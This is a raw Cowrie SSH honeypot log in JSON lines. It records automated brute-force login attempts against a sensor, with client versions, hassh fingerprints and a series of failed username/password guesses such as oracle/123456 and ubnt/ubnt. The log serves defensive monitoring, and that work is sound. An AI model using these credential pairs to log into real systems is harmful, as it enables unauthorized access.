{"eventid":"cowrie.login.failed","username":"hamza","password":"hamza@2024","message":"login attempt [hamza/hamza@2024] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:58.849859Z","src_ip":"212.227.235.229","session":"14e9ae2e21b7"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:59.944110Z","src_ip":"212.227.235.229","session":"14e9ae2e21b7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:03.369221Z","src_ip":"212.227.125.160","session":"d18e3a42eff9"}
{"eventid":"cowrie.session.closed","duration":"20.5","message":"Connection lost after 20.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:06.156307Z","src_ip":"212.227.125.160","session":"d18e3a42eff9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54900,"dst_ip":"1.2.3.4","dst_port":22,"session":"2152b9016794","protocol":"ssh","message":"New connection: 212.227.235.229:54900 (1.2.3.4:22) [session: 2152b9016794]","sensor":"my-vps","timestamp":"2025-08-31T05:24:07.183477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:24:08.851654Z","src_ip":"212.227.235.229","session":"2152b9016794"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:24:08.852709Z","src_ip":"212.227.235.229","session":"2152b9016794"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36474,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e20dab18cba","protocol":"ssh","message":"New connection: 212.227.235.229:36474 (1.2.3.4:22) [session: 1e20dab18cba]","sensor":"my-vps","timestamp":"2025-08-31T05:24:10.423614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:24:11.203801Z","src_ip":"212.227.235.229","session":"1e20dab18cba"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:24:11.205537Z","src_ip":"212.227.235.229","session":"1e20dab18cba"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:17.221833Z","src_ip":"212.227.235.229","session":"2152b9016794"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin123","message":"login attempt [test/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:17.347070Z","src_ip":"212.227.235.229","session":"1e20dab18cba"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:19.144736Z","src_ip":"212.227.235.229","session":"1e20dab18cba"}
{"eventid":"cowrie.session.closed","duration":"12.6","message":"Connection lost after 12.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:19.759346Z","src_ip":"212.227.235.229","session":"2152b9016794"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46842,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca86310f88f1","protocol":"ssh","message":"New connection: 212.227.125.160:46842 (1.2.3.4:22) [session: ca86310f88f1]","sensor":"my-vps","timestamp":"2025-08-31T05:24:30.321547Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54566,"dst_ip":"1.2.3.4","dst_port":22,"session":"e777b18a2d2c","protocol":"ssh","message":"New connection: 212.227.125.160:54566 (1.2.3.4:22) [session: e777b18a2d2c]","sensor":"my-vps","timestamp":"2025-08-31T05:24:31.846615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:24:32.207720Z","src_ip":"212.227.125.160","session":"e777b18a2d2c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:24:32.208491Z","src_ip":"212.227.125.160","session":"e777b18a2d2c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:24:32.834787Z","src_ip":"212.227.125.160","session":"ca86310f88f1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:24:32.835862Z","src_ip":"212.227.125.160","session":"ca86310f88f1"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin123","message":"login attempt [test/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:34.001003Z","src_ip":"212.227.125.160","session":"e777b18a2d2c"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:35.715720Z","src_ip":"212.227.125.160","session":"e777b18a2d2c"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:40.152200Z","src_ip":"212.227.125.160","session":"ca86310f88f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55416,"dst_ip":"1.2.3.4","dst_port":22,"session":"24922609351c","protocol":"ssh","message":"New connection: 212.227.235.229:55416 (1.2.3.4:22) [session: 24922609351c]","sensor":"my-vps","timestamp":"2025-08-31T05:24:40.283665Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:24:40.286440Z","src_ip":"212.227.235.229","session":"24922609351c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:24:40.559068Z","src_ip":"212.227.235.229","session":"24922609351c"}
{"eventid":"cowrie.login.failed","username":"hamza","password":"hamza@2024","message":"login attempt [hamza/hamza@2024] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:41.652415Z","src_ip":"212.227.235.229","session":"24922609351c"}
{"eventid":"cowrie.session.closed","duration":"11.3","message":"Connection lost after 11.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:41.662631Z","src_ip":"212.227.125.160","session":"ca86310f88f1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:42.929682Z","src_ip":"212.227.235.229","session":"24922609351c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58162,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bfa6f643955","protocol":"ssh","message":"New connection: 212.227.235.229:58162 (1.2.3.4:22) [session: 6bfa6f643955]","sensor":"my-vps","timestamp":"2025-08-31T05:24:45.996824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:24:46.457192Z","src_ip":"212.227.235.229","session":"6bfa6f643955"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:24:46.457924Z","src_ip":"212.227.235.229","session":"6bfa6f643955"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:50.590357Z","src_ip":"212.227.235.229","session":"6bfa6f643955"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:24:52.270443Z","src_ip":"212.227.235.229","session":"6bfa6f643955"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51384,"dst_ip":"1.2.3.4","dst_port":22,"session":"37c14f56276d","protocol":"ssh","message":"New connection: 212.227.235.229:51384 (1.2.3.4:22) [session: 37c14f56276d]","sensor":"my-vps","timestamp":"2025-08-31T05:24:58.108979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:24:58.115006Z","src_ip":"212.227.235.229","session":"37c14f56276d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:24:58.368342Z","src_ip":"212.227.235.229","session":"37c14f56276d"}
{"eventid":"cowrie.login.failed","username":"arkserver","password":"arkserver!","message":"login attempt [arkserver/arkserver!] failed","sensor":"my-vps","timestamp":"2025-08-31T05:24:59.373152Z","src_ip":"212.227.235.229","session":"37c14f56276d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:00.627238Z","src_ip":"212.227.235.229","session":"37c14f56276d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52768,"dst_ip":"1.2.3.4","dst_port":22,"session":"04ee4619bf8b","protocol":"ssh","message":"New connection: 212.227.125.160:52768 (1.2.3.4:22) [session: 04ee4619bf8b]","sensor":"my-vps","timestamp":"2025-08-31T05:25:04.232557Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35768,"dst_ip":"1.2.3.4","dst_port":22,"session":"08b569a8a186","protocol":"ssh","message":"New connection: 212.227.235.229:35768 (1.2.3.4:22) [session: 08b569a8a186]","sensor":"my-vps","timestamp":"2025-08-31T05:25:04.341722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:25:04.342749Z","src_ip":"212.227.235.229","session":"08b569a8a186"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:25:04.435275Z","src_ip":"212.227.235.229","session":"08b569a8a186"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"smoker666","message":"login attempt [daemon/smoker666] failed","sensor":"my-vps","timestamp":"2025-08-31T05:25:04.846326Z","src_ip":"212.227.235.229","session":"08b569a8a186"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:25:05.941293Z","src_ip":"212.227.235.229","session":"08b569a8a186"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:25:08.004585Z","src_ip":"212.227.125.160","session":"04ee4619bf8b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:25:08.005255Z","src_ip":"212.227.125.160","session":"04ee4619bf8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42882,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc21ff978bda","protocol":"ssh","message":"New connection: 212.227.235.229:42882 (1.2.3.4:22) [session: fc21ff978bda]","sensor":"my-vps","timestamp":"2025-08-31T05:25:09.209345Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":48940,"dst_ip":"1.2.3.4","dst_port":22,"session":"4656b15ceb92","protocol":"ssh","message":"New connection: 170.64.166.123:48940 (1.2.3.4:22) [session: 4656b15ceb92]","sensor":"my-vps","timestamp":"2025-08-31T05:25:09.484291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:25:09.484954Z","src_ip":"170.64.166.123","session":"4656b15ceb92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:25:09.764151Z","src_ip":"170.64.166.123","session":"4656b15ceb92"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:25:09.909995Z","src_ip":"212.227.235.229","session":"fc21ff978bda"}
